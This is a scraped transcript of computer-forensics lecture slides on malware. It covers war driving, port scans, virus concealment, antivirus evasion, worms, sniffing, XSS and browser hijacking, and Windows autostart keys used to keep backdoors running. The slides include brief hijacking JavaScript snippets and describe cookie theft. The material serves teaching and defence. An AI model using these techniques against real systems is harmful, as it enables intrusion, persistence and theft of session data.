malware scanners sniffers viruses worms mobile code l.
Skip this Video
Loading SlideShow in 5 Seconds..
Malware: Scanners, Sniffers, Viruses, Worms, Mobile Code PowerPoint Presentation
Download Presentation
Malware: Scanners, Sniffers, Viruses, Worms, Mobile Code

Loading in 2 Seconds...

play fullscreen
1 / 254

Malware: Scanners, Sniffers, Viruses, Worms, Mobile Code - PowerPoint PPT Presentation

  • Uploaded on

Malware: Scanners, Sniffers, Viruses, Worms, Mobile Code. COEN 252 / 152: Computer Forensics. Scanning. Wireless Scanners War driving: Finding Wireless Access Points Normal WLAN needs < 100 m to access point to function well. Good antenna can get a signals from miles away.

I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
Download Presentation

Malware: Scanners, Sniffers, Viruses, Worms, Mobile Code

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
  • Wireless Scanners
    • War driving: Finding Wireless Access Points
      • Normal WLAN needs < 100 m to access point to function well.
      • Good antenna can get a signals from miles away.
        • Omni-directional antenna make war driving easy.
        • Directional antenna yield better results.
          • Can build a good one out of a Pringles box.

Home-made War Driving Antenna

  • War driving goal:
    • Locate WLANs
    • Determine Extended Service Set Identifier (ESSID)
  • Access points transmit beacon packets approximately every 100 msec.
  • Active Scanning:
    • Broadcast 802.11 probe packets with ESSID of “Any”
    • Implemented by netstumbler.
    • Or Windows XP SP 2.
  • Listening for Beacons
    • Put wireless card into the monitor mode.
      • AKA rfmon
    • Read all packages.
      • Implemented by Wellenreiter, Kismet,
  • Forcing Deauthentication
    • Some WLANs ignore probes with an ESSID of “any”.
    • First, get MAC address of access point.
    • Tool sends a wireless deauthenticate message to client with spoofed MAC of access point.
    • Clients now need to reassociate, revealing the ESSID.
  • Hardening
    • Set ESSID to something that does not contain the name of your organization.
    • Configure access points to ignore probe requests that don’t include the ESSID.
    • Use stronger authentication mechanism.
      • Do not rely on MAC address alone, since this can be spoofed.
    • Switch from WEP to WPA
    • Reset transmission power of access points.
  • War Dialing
    • Looking for modems by dialing all numbers of an organization.
    • Target are ill-configured modems.
      • Especially those connected to computers with remote control products such as VNC, psAnywhere, Mini Remote Control, Laplink Gold, …
  • Network Mapping

(Assume that attackers have gained access to the target system.)

    • Sweeping:
      • Attempting to ping all possible addresses.
    • Port mapping:
      • Identify services listening on ports:
        • TCP Connect Scan
          • Tries to complete TCP threeway handshake.
        • TCP Syn Scan
          • Attacker sends Syn, but does not ack to the Syn-Ack response by the target.
          • (Many systems do not log these interrupted connection attempts.)
          • Could result into an accidental DOS attack, since target buffers these attempts waiting for completion. Attacker could send Reset instead of the final Ack to avoid this.
  • Network Mapping
    • Port mapping:
      • Identify services listening on ports:
        • Protocol Violators:
        • TCP FIN
          • Attacker sends FIN packet.
          • Target supposed to send RESET packet, if port is closed.
          • Target does not send anything back if the port is open.
        • Xmas Tree Scan:
          • Attacker sends packets with URG, ACK, PSH, RST, SYN, and FIN flags.
        • Null Scan:
          • Attacker sends packet without any flags set.
          • Closed port sends RESET, listening port sends nothing.
  • Network Mapping
    • Port mapping:
      • Identify services listening on ports:
        • Protocol Violators:
        • TCP ACK Scan
          • “Firewall Friendly”: Stateless firewalls will only let TCP packages through with the ACK flag set.
          • If packet passes through the firewall, then the internal system answers with a RESET packet.
          • Response of target is somewhat OS dependent.
  • FTP Bounce Scans:
    • Goal: Source IP address does not show up in target logs.
    • Exploits old FTP option (sometimes available with printers that support FTP):
      • FTP server allows a user to connect to them and requests that the server send a file to another system.
      • Attacker requests that a file is sent to every port on the target.
      • If the target port is open, then the FTP server tells the attacker that it opened the connection, but could not communicate.
      • If the target port is closed, then the FTP server tells the attacker that it could not communicate with the target.
  • Idle Scanning
    • IP header includes a field “IP Identification”.
      • Bunches together a bunch of fragments.
      • Windows increases IP ID by one whenever it needs a new number.
    • Attacker first identifies a system that is being blamed.
    • Attacker then determines the current IP ID at the blamed system.
    • Attacker then sends fake message purporting to be from the blamed system to the target.
    • Target will increment IP ID number at the blamed system if it sends a reset.
    • Attacker determines whether the IP ID number has increased.







SYN to TCP port 12345


SYN-ACK from Port 12345


Port open: Reset, IP-ID = 6





Target must have sent a reset attack.

malware types
Malware Types
  • Self-replicating malware
    • Creates new instances of itself
    • In contrast to passive replication
  • Population growth
    • Changes in number of instances
  • Parasitic malware
    • Requires some other executable code to exist
malware types25
Malware Types
  • Logic Bomb
    • not self-replicating, zero population growth, possibly parasitic
    • Consists of
      • Payload
        • An action to be performed
      • Trigger
        • Boolean condition to be executed
    • Example:
      • If Thomas Schwarz is not getting paid then delete the COEN website.
malware types26
Malware Types
  • Trojan Horse
    • parasitic
    • Program that purports doing something benign
    • But secretely performs a malicious task
    • Example:
      • Authentic looking login page with username and password prompt
      • Stores result in a file, exits user, so that true login page appears
malware types27
Malware Types
  • Backdoor
    • Mechanism that bypasses normal security checks
  • Virus
    • Self-replicating
    • Positive Population Growth
    • Parasitic
    • Runs when a certain executable runs
    • Infects other executables
      • Traveling on same system, floppy, CD, DVD, USB
    • First mentioned in SF novel “The Scarred Man” Gregory Benford, 1970
malware types28
Malware Types
  • Worm
    • self-replicating
    • positive population growth
    • not parasitic
    • Spread from machine to machine across a network
malware types29
Malware Types
  • Rabbits
    • Tries to consume all system resources by multiplying quickly
      • Fork bomb
    • A worm that deletes itself after infecting another machine
      • Worm hops from machine to machine
malware types30
Malware Types
  • Spyware
    • Software that collects information from a system and transmits it to someone else.
  • Addware
    • Spyware that presents adds.
  • Viruses consist of
    • Infection Mechanism
      • Can be multipartite
    • Trigger (optional)
    • Payload (optional)
  • Target Classification
    • Boot-Sector Infectors
    • File Infectors
    • Macro Viruses
  • Concealment Strategy Classification
    • No Concealment
    • Encryption
    • Stealth
    • Oligomorphism, Polymorphism, Metamorphism
virus boot sector infectors
Virus: Boot Sector Infectors
  • Contains code that runs when a system starts up.
  • Volume Boot Record
    • First sector of an unpartitioned storage device
    • First sector of an individual partition
  • Master Boot Record
    • First sector of data storage device that has been partitioned
virus boot sector infectors34
Virus: Boot Sector Infectors
  • Booting:
    • Bootstrap loader
      • Loads software to start OS
    • Multi-stage bootstrap loader
    • Boot sequence on IBM-PC
      • Runs instruction at memory location F000:FFF0 of BIOS
      • Jumps to execution of BIOS startup program
      • Executes Power-On Self-Test (POST)
        • Checks, initializes devices
      • Goes through preconfigured list of devices
      • If it finds bootable device, loads, and executes boot sector
        • Assume MBR on hard drive
        • MBR contains address of bootable partition
        • Load boot sector of bootable partition
        • Boot sector moves OS kernel into memory and starts it
virus boot sector infectors35
Virus: Boot Sector Infectors
  • Boot Sector Infector
    • Copies itself into the MBR or VBR
    • Typically after making copy of MBR in a “safe location”
    • Michelangelo:
      • April 1991
      • Moves original boot sector to safe location
      • Infects all floppy disks inserted into computer
      • Payload:
        • overwrites file system with zeroes
      • Extinct in the wild
virus boot sector infectors36
Virus: Boot Sector Infectors
  • Boot Sector Infector
    • Stoned Virus
      • Original version infects only 360KB diskettes
      • 1988
      • Many variants
      • Behavior
        • Becomes memory resident
        • Disables interrupt 12
        • Infects MBR
        • Infects all diskettes
          • Moves boot sector to sector 11 and copies itself into sector 0
          • Same values as chosen by Michelangelo, so that computers infected with both became immediately dysfunctional
          • Usually destroys part of the file system
      • Payload: Displays message during boot process:
        • “Your PC is now Stoned!
        • Your computer is now stoned.
virus boot sector infectors37
Virus: Boot Sector Infectors
  • Extinct in the wild:
    • Floppies are rarely used to boot, disabling the propagation mechanism
    • OS prevent writing to a disk’s boot sector without proper authorization
    • BIOS can enable boot block protection
virus file infectors
Virus: File Infectors
  • Virus infects executables
    • Virus is placed in an executable
      • Prepending Virus: At the beginning
        • Execution of a *.com loads file into memory
        • Set PC to beginning of file
        • Often copies infected file further down




virus file infectors39



Virus: File Infectors
  • Appending Virus: At the end
    • To get control
      • Save original instruction in code, replace by jump to viral code, execute virus, restore original instruction and jump to them or run original instruction at saved location followed by jump to the rest of the code
      • Executable file formats can specify start location in file header


virus file infectors40
Virus: File Infectors
  • Overwriting Viruses
    • Atop original code
    • Does not change file size
    • Virus gets control in normal execution of file
    • Placement Strategies:
      • Place virus in superfluous data
      • Place virus in file slack or unused allocated file space
      • Stash overwritten contents in a companion file
      • Compress (parts of) the original file, decompress
virus file infectors41
Virus: File Infectors
  • Inserting Virus
    • Move target code out of way
    • Intersperse small pieces of virus with infected file
  • Companion Virus
    • Virus gets executed before infected file
    • Infected file barely changed
virus file infectors42
Virus: File Infectors
  • Companion Virus Example
    • Change name of target file
      • Copy notepad.exe to notepad.exp
      • Virus is in new notepad.exe, which calls notepad.exp
    • Virus placed earlier in search path
      • notepad.exe in a different directory than real notepad.exe
      • is executed before notepad.exe
    • Use Windows registry to change association for .exe files
    • Change “interpreter in ELF files
      • Typically the run-time linker, but now virus
    • Associate icon of target with virus
virus macro virus
Virus: Macro Virus
  • Macros
    • Code that is part of documents.
    • Used extensively in MS Office Tools
      • Written in or translated to Visual Basic for Applications (VBA) code
  • Macro Virus
    • Changes or creates new macro
virus macro virus44
Virus: Macro Virus
  • Example:
    • Concept 1995-1997
    • Infects Word’s global document-template NORMAL.DOT
      • Creates PayLoad and FileSaveAs macros
      • Infects all documents saved with the Save As command
virus macro virus45
Virus: Macro Virus
  • Example: Laroux
    • 1996 –
    • Excel macro virus
    • Consists of auto_open and check_files
      • auto_open executes whenever an infected spreadsheet is opened, followed by check_files
      • Virus looks for PERSONAL.XLS
    • Virus contains no malicious payload
virus macro virus46
Virus: Macro Virus
  • Protective Strategies
    • Later versions of MS Office have security levels for execution of macros
      • Level high only executes signed macros
    • MS Office provides warnings when files contain macros
    • ScanProt (Word prior to 7.0a) scans for the Concept virus
virus concealment
Virus: Concealment
  • Encryption
    • Virus body is encrypted to make it harder to detect
    • Virus needs to contain a decryption engine
    • Encryption methods range from very simple to strong
virus concealment48
Virus: Concealment
  • Stealth
    • Virus takes active steps to conceal infection
      • Restore original file timestamp
      • Intercept system calls to play back original information of file
        • Change I/O calls in DOS
        • Change system libraries in more sophisticated OS
        • Run rootkit
  • Anti-stealth virus
    • Virus makes all files look infected
    • Payload: Anti-virus software deletes all other files
virus concealment49
Virus: Concealment
  • Oligomorphism
    • Encrypted virus changes encryption key between infections
    • Infected files have different file signatures
  • Polymorphism
    • Virus also changes decryption engine
      • By using equivalent instruction sequences
      • By using different versions
        • Tremor had 6 decryption engines
    • Makes it difficult for virus to detect its presence
      • Virus can use specific timestamp (e.g. add 100 to file year)
      • Pad file sizes of infected files to a certain value
      • Use hidden flags in ELF format
      • Use metadata or alternative data streams (in NTFS)
      • Store data in registry or other location
virus concealment50
Virus: Concealment
  • Hiding Decryptor Engine
    • Using a mutation engine
      • Instruction equivalence
        • All these set register r0 to zero:
          • clear r0
          • xor r0,r0
          • and 0, r0
          • move 0, r0
      • Instruction sequence equivalence
      • Instruction reordering
      • Register renaming
      • Data reordering
      • Spaghetti code
      • Junk code insertion
      • Run-time code generation
      • Use a virtual machine
      • Use concurrent threads to make analysis difficult
      • Inlining, outlining, call sequence changes
virus concealment51
Virus: Concealment
  • Metamorphism
    • Use code modification to change body of virus
virus antivirus techniques
Virus: Antivirus Techniques
  • Detection
  • Identification
  • Disinfection
virus antivirus techniques static detection mechanism
Virus: Antivirus Techniques Static Detection Mechanism
  • On-demand / On –access scanning
  • Virus signatures a.k.a scan strings:
    • Identifying substrings in infected code
    • Problem: How to search for many patterns at once
  • Static Heuristics
    • Positive Heuristics
    • Negative Heuristics
virus antivirus techniques static detection mechanism54
Virus: Antivirus Techniques Static Detection Mechanism
  • Positive Heuristics (Boosters)
    • Junk code
    • Decryption loops
    • Self-modifying code
    • Use of undocumented API
    • Manipulation of interrupt vectors
    • Unusual instructions, especially those not emitted by a compiler
    • Strings containing obscenities or “virus”
    • Difference between entry point and end of file
    • Spectral analysis
      • Frequency analysis of instructions
virus antivirus techniques static detection mechanism55
Virus: Antivirus Techniques Static Detection Mechanism
  • Negative heuristics = stoppers
    • user input
    • GUI popups
  • Analysis
    • Weighted measure
      • trained by good and bad sets
    • Neural networks
    • Data mining
virus antivirus techniques static detection mechanism56
Virus: Antivirus Techniques Static Detection Mechanism
  • Integrity Checks
    • Tripwire:
      • Calculate cryptographically secure hash of all system files
      • Store it in unchangable directory
        • E.g. CD-ROM
      • Scan periodically to check integrity of all system files
      • Updates:
        • Check integrity of system
        • Patch system
        • Calculate new checksums
    • Self-checking of antivirus software
virus antivirus techniques dynamic methods
Virus: Antivirus Techniques Dynamic Methods
  • Behavior blockers:
    • Software monitors running program in real time
    • Watches for suspicious activity such as file system accesses
      • Appending virus opens executable for reading and writing
      • Generates activity signature of bad pattern:
        • open, read, write, seek to end, appending, close
    • Use notion of ownership to prevent too many false positives
virus antivirus techniques dynamic methods58
Virus: Antivirus Techniques Dynamic Methods
  • Emulation
    • Analyze code before letting it run
  • Emulation uses dynamic heuristics
    • Same as static heuristics
    • Same as behavior blockers
  • Emulation uses generic decryption
    • Use virus’ own decryption loop to scan for decrypted virus
      • Decryption loop should have run when:
        • Program accesses code that it just modified
        • 24B + of modified memory
  • Emulator can run signature searches some time into run-time of emulated code
virus antivirus techniques dynamic methods59
Virus: Antivirus Techniques Dynamic Methods
  • Emulator Architecture
    • Single stepping through a program can be detected by virus through timing
    • Instead:
    • CPU emulation
    • Memory emulation
    • Hardware and OS emulation
    • Emulation control
      • Major Issue: When to stop
        • Number of instructions
        • Amount of time spent emulating
        • Proportion of instructions that modify memory
        • Presence of stoppers
    • Post Analysis Data
      • Instruction histogram
      • Dead code
virus antivirus techniques dynamic methods60
Virus: Antivirus Techniques Dynamic Methods
  • Reentering emulation:
    • Virus code can be CPU specific. Emulation might need to run with different CPU parameters.
    • Installation of interrupt handlers should trigger emulation of the interrupt handlers
  • Using goats to verify infective behavior
    • Emulator provides a goat file to suspect file to see changes.
virus antivirus techniques verification and identification
Virus: Antivirus TechniquesVerification and Identification
  • Verification
    • reduces false positives
    • necessary for disinfection
  • Difficult only with polymorphic viruses
    • Try to decrypt virus body – X-raying
      • Side effect of emulating decryptor engine
    • Breaking weak encryption
  • Identify using
    • signatures
    • known copy of virus
    • check-summing of virus
virus antivirus techniques quarantine
Virus: Antivirus Techniques Quarantine
  • Quarantine isolates infected file from rest of the system
    • Often, copying of file to a quarantine directory
    • Trivially encrypt file to make it unrunnable
    • Render files in quarantine directory invisible
virus antivirus techniques disinfection
Virus: Antivirus Techniques Disinfection
  • Restore files from backup
  • Virus-specific actions
virus antivirus techniques anti macro virus
Virus: Antivirus Techniques Anti-Macro Virus
  • Macro can change through reformatting
    • MS Word document converter has produced new versions of a macro virus
    • Bugs in macro virus propagation mechanism can introduce new variants
    • Macro virus can incorporate other macros
      • Happened to a Word macro snatching two anti-virus macros from MS
anti anti virus techniques
Anti-Anti-Virus Techniques
  • Aggressively attack anti-virus software
  • Impede anti-virus analysis by anti-virus labs
  • Use knowledge of anti-virus mechanisms to avoid dectection
  • Not anti-virus virus
    • “Beneficial” virus
anti anti virus techniques retrovirus
Anti-Anti-Virus Techniques Retrovirus
  • Disables anti-virus software
    • Virus has list of process names of anti-virus products
    • Kills any processes with these names
    • Disables antivirus program
      • Ganda inspects programs that run at start-up (autorun)
      • Replaces first instruction of identified anti-virus programs with a return
    • Reduce priority of anti-virus software so that it never runs
    • Disable look-up of antivirus software updates
anti anti virus techniques67
Anti-Anti-Virus Techniques
  • Entry point obfuscation (EPO)
    • Alternative ways of getting virus code to run
      • Simile, Ganda look for calls to ExitProcess API
anti anti virus techniques anti emulation
Anti-Anti-Virus Techniques Anti-Emulation
  • Outlast emulation
    • Virus can do nothing bad for a long time
    • Virus only replicates randomly
    • Entry-point obfuscation also delays virus execution
  • Outsmarting emulation
    • Restructure viral code
      • No longer looks like a virus
anti anti virus techniques anti emulation69
Anti-Anti-Virus Techniques Anti-Emulation
  • Emulator detection
    • Use undocumented CPU instructions
      • In the hope that emulator crashes on them
    • Exploit differences in CPU
    • Attack emulator memory system
      • use many memory addresses
      • go to unusual memory locations
    • Test for changes between API calls
      • E.g. emulator returns always the same time stamp
    • Import obscure libraries
    • Looking for external things
      • Hard to emulate
    • Check for specific emulators
anti anti virus techniques armoring anti debugging
Anti-Anti-Virus Techniques Armoring, Anti-Debugging
  • Armoring
    • Use anti-reverse engineering techniques to make analysis of virus behavior difficult
  • Detecting Debug Mode
    • Use debugger specific idiosyncrasies
    • Detect breakpoint insertion
      • Breakpoints are implemented through system interrupts
    • Check for single-stepping
      • Interrupt dumps info on stack
        • Push on stack, then pop, see whether item is still there
      • Check for system time
      • Manipulate prefetch queue in CPU
    • Use IsDebuggerPresent API
anti anti virus techniques tunneling
Anti-Anti-Virus Techniques Tunneling
  • Tunneling virus backtracks interrupt chain to go directly to DOS and BIOS interrupt handlers
  • Avoids monitoring
  • Only possible in MS-DOS
    • Kernel software protected in other OS
anti anti virus techniques anti integrity checking
Anti-Anti-Virus Techniques Anti-Integrity Checking
  • Polymorphic virus can hide file changes against simple checksums
  • Slow virus only changes files that are about to be changed anyway
anti anti virus techniques avoidance
Anti-Anti-Virus Techniques Avoidance
  • Virus infects areas that are not checked by anti-virus software


  • Propagates across a network
  • Typically, does not require user action for propagation.


  • Infects files.
  • Typically requires user interaction.

Worm Components

  • Warhead
  • Propagation Engine
  • Target Selection Algorithm
  • Scanning Engine
  • Payload
worm warhead
Worm Warhead
  • A piece of code that exploits a vulnerability on the target system
    • Exploits such as Buffer Overflow Exploits
    • File Sharing Attacks
    • E-mail
    • Common Mis-configurations
worm propagation engine
Worm Propagation Engine
  • After gaining access, the worm must transfer itself to the target machine.
  • Some worms are completely contained in the warhead.
  • File Transfer Mechanisms
    • FTP
    • TFTP
    • HTTP
    • SMB (MS Server Message Block)
      • Windows file sharing
      • Unix servers running SAMBA
worm target selection algorithm
Worm Target Selection Algorithm
  • Once the worm has gained control of a target, it starts looking for new targets.
    • E-mail addresses
    • Host lists
    • Trusted Systems
    • Network Neighborhood
    • DNS queries
    • Randomly selected ip address.
worm scanning engine
Worm Scanning Engine
  • Once targets are identified, the worm scans for the original vulnerability.
worm payload
Worm Payload
  • Some specific action done on behalf of the attacker.
  • Opening up a backdoor.
  • Planting a distributed denial of service attack.
  • Performing complex calculations:
    • password cracking
    • math research (actually happened)
worm spread
Worm Spread
  • Worm spread is limited
    • Diversity of machines
      • “Tiny Worm”
        • targeted only machines running security software from a medium company
        • was successful in infecting most machines with that software.
      • Worms can contain support for multiple entry methods.
    • Too many victims crash
    • Fast worms can cause network congestion
worm trends
Worm Trends
  • Multiplatform worms
  • Multiexploit worms
  • Zero-day exploit worms
    • No chance to patch
  • Fast-spreading worms: Warhol / Flash
    • pre-scan targets
  • Polymorphic worms
    • Change appearance
  • Metamorphic worms
    • Change functionality
worm defenses
Worm Defenses
  • Ethical (?) Worms
  • Antivirus tools
  • Fast patching services
  • Firewalling
    • Block arbitrarily outbound connections
    • Prevents spreading
  • Establishment of Incident Response Capabilities
  • Sniffers: a program that gathers traffic from the local network.
    • Primary attack example:
      • Sniffers look for authentication information from clear-text protocols such as ftp or telnet.
    • Passive Sniffing:
      • Sniffer only gathers packets but does not change the network.
    • Active Sniffing:
      • Sniffer changes network settings.
        • Example: ARP poisoning in order to route traffic through the machine with the sniffer.
  • Active Sniffing Strategies:
    • Used to circumvent switches passing packets on only on the relevant links.
    • MAC Flooding:
      • Switches contain a Content Addressable Memory (CAM) table that maps MAC addresses and physical ports.
      • MAC flooder sends a flood of traffic with random spoofed MAC addresses.
      • When CAM is exhausted, switches either fail open (become hubs) or fail closed (stop working).
    • ARP Spoofing:
      • Attacker sends fake ARP messages to change ARP mappings.
    • Port Stealing:
      • Attacker sends numerous spoofed packets with MAC of the gateway.
      • Switch maps the MAC of gateway to the port on which the attacker sits.
      • Victim sends packets to the attacker, who buffers them.
      • Attacker finally sends an ARP request to clear the switch’s mapping.
      • Gateway responds to the ARP request. This causes the switch to remap the gateway’s MAC to the proper port.
      • Attacker now sends buffered packets to the gateway.
  • Active Sniffing Strategies:
    • DNS spoofing
      • Attacker sniffs DNS request from the line.
      • Victim tries to resolve a name using DNS.
      • Attacker sniffs the request and sends fake DNS answer.
      • Victim sends traffic now to attacker.
  • Active Sniffing Strategies:
    • Sniffing HTTPS and SSL with man-in-the-middle attack.
      • Attacker uses DNS poisoning to reroute victim’s requests to his website.
      • Victim establishes SSL connection to the attacker.
      • Attacker proxies the connection and sends certificate of his own making to victim.
      • Victim’s browser / SSL client complains about invalid certificate.
        • Error message is typically something like: “You are currently not trusting this authentication authority.”
      • Naïve user accepts.
  • Active Sniffing Strategies:
    • TCP Nicing
      • Attacker injects tiny TCP window advertisements.
      • Victim slows down TCP rate and sniffer can keep up.
malicious mobile code
Malicious Mobile Code
  • Mobile Code
    • Light-weight code that is downloaded from a remote system and executed locally with none or little user intervention.
    • Examples:
      • Java Applets
      • JavaScripts
      • Visual Basic Scripts
      • Active X controls
malicious mobile code90
Malicious Mobile Code
  • Targets of malicious codes:
    • Monitoring of browser activities.
    • Obtaining access to file system.
    • Infection with a Trojan horse.
    • Hijacking web browser.
malicious mobile code91
Malicious Mobile Code
  • Target Applications
    • Web-browsers (most important target)
    • E-mail readers
      • Either directly or because they use the installed browser to read html messages.
    • XML-based protocols
    • Web Service Architecture
malicious mobile code92
Malicious Mobile Code
  • Browser scripts:
    • Use scripting languages such as JavaScript, JScript, VBScript, …
malicious mobile code93
Malicious Mobile Code
  • Attack code
    • Can exhaust resources.
      • By creating an infinite series of dialogue boxes.
      • By creating a form and fill in an infinite number of characters.
    • Hijack the browser:
      • Takeover browser process.
malicious mobile code94
Malicious Mobile Code
  • Browser Hijacking
    • Use the onunload( ) function:
      • <body onunload=“‘trap.html’))”>
    • Can be enhanced by resizing the window to fill the screen:
      • self.moveTo(0,0);
      • self.resizeTo(screen.availWidth,screen.availHeight);
    • Can be enhanced with popup windows.
    • Add bookmarks:
      • window.external.addFavorite(‘http://www.cse.scu’,’Info’);
malicious mobile code95
Malicious Mobile Code
  • Stealing cookies via browser vulnerabilities
    • Browser automatically supplies cookies associated with the domain of that website.
    • These cookies can contain valuable information.
      • Including authentication.
malicious mobile code96
Malicious Mobile Code
  • IE 5.01 vulnerability:
    • Create server-side program capable of reading cookies.
    • Compose a URL that would fool the browser into thinking that the site visited belongs to a different domain.


is translated into

  • IE 5.01 would think that the top URL belongs to the boa domain and provide the cookies.
malicious mobile code97
Malicious Mobile Code
  • Capturing cookies
    • With tricky URLs (see above)
    • URL can be hidden in a javascript command or in a hidden region of html code.
malicious mobile code98
Malicious Mobile Code
  • Mozilla had a vulnerability that executed javascript in the URL.
malicious mobile code99
Malicious Mobile Code
  • Browsers allow Javascript in URL if preceded by javascript:
malicious mobile code100
Malicious Mobile Code
  • Browsers allow Javascript in URL if preceded by javascript.
  • Change javascript in URL to retrieve cookies.
malicious mobile code101
Malicious Mobile Code
  • XSS (cross scripting) attack
  • Authors injects malicious code into a website.
  • Browsers of visitors to this website will execute the code.
malicious mobile code102
Malicious Mobile Code
  • XSS (cross scripting) attack
  • Vulnerable search engine does not strip out the JavaScript script:
    • Search engine sends the script back to victim’s browser.
    • Victim’s browser executes JavaScript.
      • Browser pop-ups alert with cookie values.
  • Attacker needs to trick the victim into using this URL.
malicious mobile code103
Malicious Mobile Code
  • XSS (cross scripting) attack
    • Assume victim has interactions with a vulnerable website.
    • Attacker crafts a link, sends it to the victim (e.g. via email) and tricks the victim into clicking on the link.
    • Victims browser uses the attacker-provided URL to go to the vulnerable web server.
    • Web server “reflects” JavaScript back to victim’s browser.
    • Victim’s browser executes JavaScript (because it trusts the vulnerable web server.)
      • Attack JavaScript payload might be transmission of cookies.
        • Cookies can then be used to hijack a session, …
malicious mobile code104
Malicious Mobile Code
  • XSS (cross scripting) attack
    • Malicious script can also be embedded in html documents.
malicious mobile code105
Malicious Mobile Code
  • Script sends invisible request to containing cookies.
  • Attacker’s cgi script on the evil side processes the cookies.
  • Stolen cookies can be used to clone connections.
malicious mobile code106
Malicious Mobile Code
  • Defenses on Server Side
    • Input filtering
      • Remember, all input is (potentially) evil.
      • This is very hard, since scripts can be hidden very well.
    • Output filtering
      • The attack scripts needs to be reflected to the victim. So, this works.
malicious mobile code107
Malicious Mobile Code
  • Defenses on Client (= Browser) side
    • Never surf the internet with administrator privileges.
    • Disable scripts.
      • IE explorer introduced security zones to automatically disable scripts for general domains.
malicious mobile code108
Malicious Mobile Code
  • Active X Controls
    • Part of Common Object Model COM
    • Have the same powers as a normal program
      • Microsoft Agent allows inclusion of animated and interactive cartoon characters in web pages.
    • Are executed with the same permission set as the browser.
      • E.g. administrator privileges.
malicious mobile code109
Malicious Mobile Code
  • Active X-controls can be cryptographically signed.
  • Possible to use social engineering to get users to accept the active X-control.
    • For example, sign certificate by unknown certification authority.
malicious mobile code110
Malicious Mobile Code
  • Browser Plug-Ins (a.k.a. Browser Helper Objects (BHO) for IE.)
    • Extends functionality of IE.
  • Google search bar is an BHO
  • Preferred by writers of spyware.
      • Gator
      • Xupiter
    • Have hidden functionality
  • Check with BHODemon
malicious mobile code112
Malicious Mobile Code
  • Exploits in Non-malicious ActiveX controls
    • Some ActiveX controls are only designed for local use since they access system resources.
      • Could mistakenly be designated as safe for scripting.
      • A hostile web-site can then call them in its html code.
        • Eyedog (1999)
        • Scriptlet.Typelib (1999)
    • Some ActiveX controls are exploitable.
      • Old Macromedia flash player when provided with a carefully crafted input string.
malicious mobile code113
Malicious Mobile Code
  • Java Applets
    • By default, run in a sandbox.
      • Browser invokes Java plug-in.
      • If not signed, Java Runtime Environment (JRE) runs it in a sandbox.
      • If signed, java.policy file determines what happens.
    • Attackers can use social engineering to get users to run bad java applets.
    • Historically, there were exploits in the JRE.
malicious mobile code114
Malicious Mobile Code
  • Java Runtime Engine exploits:
    • Brown Orifice (2000)
      • Applet was able to run as a web server with full access to the victim’s file system.
    • Redirection of browsing session to an arbitrary server (2002)
      • Van der Wal: applets used to access external URLs could bypass network access restrictions.
    • Opera browser crash (2003)
      • Malicious applet invoked Opera JRE class that crashed when provided with a long input string.
malicious mobile code115
Malicious Mobile Code
  • E-mail clients can function essentially as a regular web browser.
  • All mobile code exploits function for email clients.
    • Javascript can execute by merely previewing the email.
    • BubbleBoy and Kak worms spread via email messages.
malicious mobile code116
Malicious Mobile Code
  • Web Bugs
    • Tiny image within an html document.
    • Lead to download http request.

http request comes with source IP.

Used by advertisers.

malicious mobile code117
Malicious Mobile Code
  • Web bug privacy attack
    • Attacker sets cookies with unique ID.
    • Spam with web bug
      • Call to web bug resource comes with cookie attached.
      • Call to web bug resource comes with email address attached.
    • Initial session is no longer anonymous.
malicious mobile code118
Malicious Mobile Code
  • Exploiting Browser Vulnerabilities
    • Assumed to be less dangerous, since victim needs to be tricked to go to a bad site.
    • Example: Download.Ject flow in Internet Explorer (2004)
      • Attacker took over several e-commerce servers.
      • An innocent victim surfed to some of these sites.
      • E-commerce server responded with a webpage that exploits the browser.
      • Browser exploit downloads keylogger.
      • Keylogger gathers financial data from victim’s computer use.
      • Keylogger sends financial data to attacker controlled website.
malicious mobile code119
Malicious Mobile Code
  • Exploiting Browser Vulnerabilities
    • Example: IFRAME flaw (2004)
      • Attacker took over an ad-server.
      • Victim’s computer downloaded ad.


A program that allows attackers to bypass normal security controls on a system, gaining access to which they are not entitled.

backdoor types
Backdoor Types
  • Local Escalation of Privilege
  • Remote execution of individual commands.
  • Remote command-line access.
  • Remote control of the GUI.
backdoor installation
Backdoor Installation
  • Attacker has compromised the system
  • Virus, worm, or malicious mobile code installs the backdoor.
  • Social engineering: Tricking the victim into installing the backdoor.
  • ...
starting backdoors automatically
Starting backdoors automatically

Attacker wants to maintain access to the system.

  • Backdoor needs to restart whenever the system restarts.
  • Methods are OS dependent.
starting backdoors automatically on windows
Starting backdoors automatically on Windows
  • Altering Startup Files and Folders
  • Registry
  • Task Scheduler
starting backdoors automatically on windows125
Starting backdoors automatically on Windows
  • Startup folders and files
    • Autostart folders for individual users and all users.
starting backdoors automatically on windows126
Starting backdoors automatically on Windows


  • win.ini
  • system.ini
    • Modify “shell=explorer.exe” on Win9x
  • wininit
  • winstart.bat (Win9x)
  • Autoexec.bat (Win9x)
  • Config.sys (Win9x)
starting backdoors automatically on windows127
Starting backdoors automatically on Windows
  • Registry keys start programs on login or reboot:
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\
      • RunServicesOnce
      • RunServices
      • RunOnce
      • Run
      • RunOnceEx
starting backdoors automatically on windows128
Starting backdoors automatically on Windows
  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\
    • RunServicesOnce
    • RunServices
    • RunOnce
    • Run
    • RunOnceEx
starting backdoors automatically on windows129
Starting backdoors automatically on Windows
  • Registry keys start programs on login or reboot:
    • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
    • HKLM\SOFTWARE\Policies\Microsoft\Windows\System\
      • Scripts
      • Explorer\Run
starting backdoors automatically on windows130
Starting backdoors automatically on Windows
  • Registry keys start programs on login or reboot:
    • HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
    • HKCU\SOFTWARE\Policies\Microsoft\Windows\System\
      • Scripts
      • Explorer\Run
starting backdoors automatically on windows131
Starting backdoors automatically on Windows
